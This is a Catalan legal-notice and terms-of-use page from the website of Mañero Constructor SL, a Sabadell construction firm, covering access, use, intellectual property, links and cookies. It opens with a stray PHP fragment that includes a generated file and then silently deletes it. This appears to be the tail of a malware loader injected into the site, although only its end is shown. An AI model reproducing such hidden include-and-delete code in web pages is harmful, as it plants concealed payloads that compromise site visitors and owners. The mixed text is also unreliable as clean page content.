");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Avís legal - Mañero
937 45 15 80

1. INFORMACIÓ GENERAL

Aquestes Condicions Generals regulen l'ús del web MANEROCONSTRUCTORS.ES al que s'accedeix mitjançant l'adreça principal
www.maneroconstructors.es
En compliment del previst en la Llei 34/2002, d'11 de juliol, de Serveis de la Societat de la Informació, s'informa que aquest web ha estat creat, és mantingut i és propietat de MAÑERO CONSTRUCTOR, SL., entitat amb domicili en la Ronda Zamenhoz, 24. 08208 SABADELL, Barcelona (Espanya), proveïda de CIF: B-59327320, i inscrita en el Registre Mercantil de Barcelona, Foli 110 Tom 20130 Fulla numero B-1654, inscripció primera. Els usuaris podràn establir comunicació directa i efectiva amb MAÑERO CONSTRUCTOR, SL., titular del present lloc no només mitjançant visita personal o correu dirigit al seu domicili social, sinó també pels següents mitjans:
Tel +34 937 45 15 80
Fax +34 937 27 54 71
E-mail : info@maneroconstructors.es

02. ACCEPTACIÓ DE LES CONDICIONS D'ÚS

L'accés a aquest website o la seva utilització en qualsevol forma implica l'acceptació de totes i cadascuna de les presents condicions generals d'ús i de les quals, unilateralment, en qualsevol moment, pugui establir “MAÑERO CONSTRUCTOR, SL. MANEROCONSTRUCTORS”. En conseqüència, serà responsabilitat de tot visitant o usuari l'atenta lectura de les condicions generals d'ús vigents en cadascuna de les ocasions en què accedeixi a aquest website. La utilització de determinats serveis implicarà així mateix l'acceptació, sense reserva alguna, de les normes particulars o instruccions que MAÑERO CONSTRUCTOR, SL pogués establir en qualsevol moment amb caràcter específic, substitutiu o complementari al de les presents condicions generals.

3. CONDICIONS D'ACCÉS

En general, l'accés a la informació i als serveis facilitats per MAÑERO CONSTRUCTOR, SL., serà lliure i gratuït, i no s'exigirà als usuaris que facilitin dades personals, ni la utilització de claus o contrasenyes, ni la prèvia subscripció, excepte per accedir a determinats continguts o serveis.

Quan per a l'accés a determinats continguts o per a la utilització d'algun servei sigui necessari facilitar dades de caràcter personal, els usuaris garantiràn la seva veracitat, exactitud, autenticitat i vigència. MAÑERO CONSTRUCTOR, SL., donarà a aquestes dades el tractament automatitzat que correspongui en funció de la seva naturalesa o finalitat, en les condicions i termes indicats en la secció de Privadesa.

Així mateix, en aquests casos, si fos necessària la utilització de claus d'accés (nom d'usuari i contrasenya), els usuaris hauran de tenir en compte el següent:

  • La contrasenya triada per l'usuari no podrà ser contrària a la moral ni als bons costums . generalment acceptades, ni podrà lesionar els drets a l'honor i a la pròpia imatge de tercers, així com tampoc infringir de cap manera els drets de propietat industrial o intel·lectual de tercers.
  • Les claus d'accés són per a ús personal i exclusiu de l'usuari titular de les mateixes, i la seva custòdia, confidencialitat i correcta utilització són de la seva exclusiva responsabilitat. MAÑERO CONSTRUCTOR, SL. no serà responsable per cap perjudici en què l'usuari o tercers puguin incórrer com a conseqüència que altres persones utilitzin la seva contrasenya, amb o sense consentiment o coneixement de l'usuari.
  • MAÑERO CONSTRUCTOR, SL” es compromet a complir amb l'obligació de secret respecte de la contrasenya utilitzada per l'usuari.

4. CONDICIONS D'UTILITZACIÓ

La utilització del website de MAÑERO CONSTRUCTOR, SL haurà d'obeir al contingut d'aquestes Condicions Generals, a qualsevol disposicions legals aplicables i a les exigències de la moral i els bons costums generalment acceptades, així com a les d'ordre públic.

Excepte prèvia i expressa autorització de MAÑERO CONSTRUCTOR, SL., els usuaris únicament podran utilitzar els seus continguts i serveis per a ús propi i personal i, per tant, s'abstindran de realitzar qualsevol acte que, directa o indirectament, suposi una explotació comercial dels mateixos.

En tot cas, els usuaris utilitzaran els continguts i serveis facilitats per MAÑERO CONSTRUCTOR, SL. de conformitat amb la legalitat vigent, i assumiran les responsabilitats que els corresponguin per les conductes o activitats que, en qualsevol forma, puguin resultar il·lícites o lesives per a drets de tercers o que puguin perjudicar, impedir o limitar la utilització d'aquest website a altres usuaris.

En particular, i a títol merament indicatiu i no limitatiu, els usuaris es comprometen a no captar dades o continguts amb finalitats publicitàries, així com a no transmetre o difondre a través de MAÑERO CONSTRUCTOR, SL. missatges, imatges, fotografies, programari, dades o continguts que:

  • De qualsevol forma contravinguin o atemptin contra drets fonamentals reconeguts per l'ordenament jurídic.
  • Indueixin, incitin o promoguin actuacions delictives, denigratòrias, difamatòries, violentes, discriminatòries per raó de sexe, raça, religió o ideologia, o, en general, siguin contràries a la llei, a la moral o a l'ordre públic.
  • Siguin falsos, ambigus, inexactes, exagerats, obscens o extemporanis.
  • Es trobin protegits per qualssevol drets de propietat intel·lectual o industrial pertanyents a tercers, excepte prèvia i suficient autorització del seu legítim titular.
  • Lesionin o puguin lesionar el dret a l'honor, a la intimitat personal, a la pròpia imatge de terceres persones o infringeixin la normativa sobre el secret o confidencialitat de les comunicacions.
  • Constitueixin publicitat il·lícita, enganyosa o deslleial.
  • Continguin virus, cavalls de Troia, cucs, bombes de temps o qualsevol un altre material o programa que pugui danyar o alterar el funcionament d'equips o sistemes informàtics.

Els usuaris respondran dels danys i perjudicis de qualsevol classe que MAÑERO CONSTRUCTOR, SL. pugui sofrir, directa o indirectament, com a conseqüència de l'incompliment de la normativa vigent o de qualsevol de les obligacions derivades de les condicions generals d'ús d'aquest website.

MAÑERO CONSTRUCTOR, SL. es reserva el dret de denegar, unilateralment i en qualsevol moment, l'accés a est assetjo web a aquells usuaris que incompleixin les presents Condicions Generals d'Ús, i això sense necessitat de previ avís o justificació.

PROPIETAT INDUSTRIAL I INTEL·LECTUAL

5.1 Propietat Industrial

La denominació MAÑERO CONSTRUCTOR, SL, així com altres signes distintius (gràfics o denominatius) que apareixen en aquest web són propietat de la mercantil MAÑERO CONSTRUCTOR, SL., qui té el dret exclusiu d'utilitzar-los en el tràfic econòmic.

Per tant, queda prohibida la seva utilització per part de tercers que manquin de la corresponent autorització. L'eventual presència en aquest lloc de signes distintius de titularitat aliena a la ressenyada en el paràgraf anterior s'efectua sense finalitat comercial i amb l'autorització dels seus legítims propietaris, sempre amb el degut respecte als seus drets.

5.2 Noms de domini

En el mateix sentit del referit en l'apartat anterior, el nom/és de domini/us WWW.MANEROCONSTRUCTORS.COM i WWW.MANEROCONSTRUCTORS.ES i tots aquells que serveixin per accedir de forma directa al present web són de titularitat exclusiva de la mercantil MAÑERO CONSTRUCTOR, SL., o bé el seu ús li ha estat cedit pel seu legítim titular. La indeguda utilització dels mateixos en el tràfic econòmic suposaria una infracció dels drets conferits pel seu registre i serà perseguit pels mitjans previstos en la Llei.

5.3 Drets d'Autor

5.3.1 Els continguts, textos, fotografies, dissenys, logotips, imatges, sons, vídeos, animacions, enregistraments, programes d'ordinador, codis font i, en general, qualsevol creació intel·lectual existent en aquest lloc, així com el propi lloc en el seu conjunt, com a obra artística multimèdia, estan protegits com a drets d'autor per la legislació en matèria de propietat intel·lectual.

5.3.2 Queden exceptuats d'aquesta protecció aquells arxius o programes d'ordinador no titularitat de MAÑERO CONSTRUCTOR, SL. i d'accés gratuït (freeware) que l'usuari pot descarregar des de diverses pàgines d'aquest lloc amb la finalitat de possibilitar o facilitar l'accés als mateixos. Es tracta, en tot cas, d'aplicacions que tenen el caràcter de domini públic per expressa voluntat dels seus autors.

5.3.3 La titularitat dels drets d'autor sobre articles, arxius o altres formes de col·laboració amb MAÑERO CONSTRUCTOR, SL. correspon als seus autors. La seva divulgació en est assetjo web s'efectua sense ànim de lucre per part de la mercantil MAÑERO CONSTRUCTOR, SL.. condicions ressenyades en les presents Condicions Generals.

5.4 Ús personal

L'usuari queda expressament autoritzat per MAÑERO CONSTRUCTOR, SL. a visualitzar, imprimir, copiar o emmagatzemar en el seu disc dur o en un altre suport físic, les creacions intel·lectuals protegides i qualsevol altre contingut o actiu emparat o no per un dret d'exclusiva, excepte els programes d'ordinador, sempre que això s'efectuï per a finalitats personals i privats de l'usuari, sense finalitat comercial o de distribució, i sense modificar, alterar o descompilar els anteriors continguts anomenats. Aquesta facultat d'ús personal s'entén reconeguda sempre que es respectin intactes els advertiments als drets d'autor i de propietat industrial aquí realitzades, i no suposa la concessió de llicència alguna a l'usuari.

Qualsevol altra utilització de les creacions intel·lectuals o continguts d'aquest lloc requerirà l'autorització expressa i per escrit de MAÑERO CONSTRUCTOR, SL.

5.5 Reserva d'accions

L'ús dels continguts o serveis de MAÑERO CONSTRUCTOR, SL. no implica ni suposa la concessió de llicència o autorització d'ús de cap classe sobre els seus drets de propietat intel·lectual o industrial o sobre qualsevol altre dret.

L'usuari d’aquest web es compromet a respectar els drets enunciats i a evitar qualsevol actuació que pogués perjudicar-los, reservant-se en tot cas MAÑERO CONSTRUCTOR, SL., l'exercici de quants mitjans o accions legals li corresponguin en defensa dels seus legítims drets de propietat intel·lectual i industrial.

6. ENLLAÇOS

En aquest web l'usuari podrà trobar diversos enllaços que li conduiran a pàgines web independents de MAÑERO CONSTRUCTOR, SL.. La seva única finalitat és la de facilitar i animar l'accés a altres fonts d'informació a Internet relacionades amb el lloc o de caràcter general. Aquesta vinculació s'efectua sense ànim algun de lucre.

MAÑERO CONSTRUCTOR, SL. no es fa responsable dels continguts als quals s'accedeixi en virtut dels esmentats enllaços, ni de les modificacions que es duguin a terme en els mateixos, ni de l'ús que d'aquells es realitzi, ni de la seva disponibilitat tècnica.

No obstant això, MAÑERO CONSTRUCTOR, SL., es compromet a fer el possible per evitar l'existència en el seu lloc web d'enllaços a llocs de contingut il·legal, que promoguin activitats il·lícites, racistes o xenòfobes o que, en general, atemptin contra els principis de llibertat i de dignitat humana o vulnerin els valors i drets reconeguts per la Constitució Espanyola i per la Declaració Universal dels Drets Humans.

En cas que tingui coneixement efectiu que la informació a la qual remet algun enllaç és il·lícita, MAÑERO CONSTRUCTOR, SL., es compromet a actuar amb la deguda diligència per eliminar o inutilitzar aquest enllaç.

En el cas que el titular d'algun lloc web estimés que algun enllaç establert des de MAÑERO CONSTRUCTOR, SL, menyscaba en qualsevol forma els seus drets o si li suposa el més mínim perjudici, tan sol ha de comunicar-ho mitjançant l'enviament d'un e-mail a info@maneroconstructors.com o per qualsevol un altre mitjà, en la confiança que l'enllaç serà donat de baixa de forma immediata, o modificat de forma satisfactòria per a l'interessat, sense necessitat d'ulteriors tràmits o explicacions per la seva banda.

7. COOKIES

MAÑERO CONSTRUCTOR, SL., posa en coneixement dels usuaris que, actualment, no utilitza ni té instal·lats “cookies” en els seus sistemes.

Les cookies són petits arxius d'informacions que es generen a través de les instruccions que els servidors web envien als programes navegadors, i que es guarden en un directori específic de l'ordinador de l'usuari.

Les cookies per si mateixes no poden identificar de manera personal a l'usuari, encara que sí poden contenir l'adreça IP de l'usuari mateix.

La majoria dels navegadors accepten la utilització de cookies de forma automàtica. No obstant això, l'usuari té la possibilitat d'impedir l'accés al seu ordinador, mitjançant l'elecció de l'opció corresponent del seu navegador.

MAÑERO
Construcció / Promoció / Immobiliària
Ronda Zamenhof, 24
08208 Sabadell
info@maneroconstructors.com
937 45 15 80
Si vols vendre el teu pis o la teva casa, no ho dubtis.
Posa't en contacte amb nosaltres.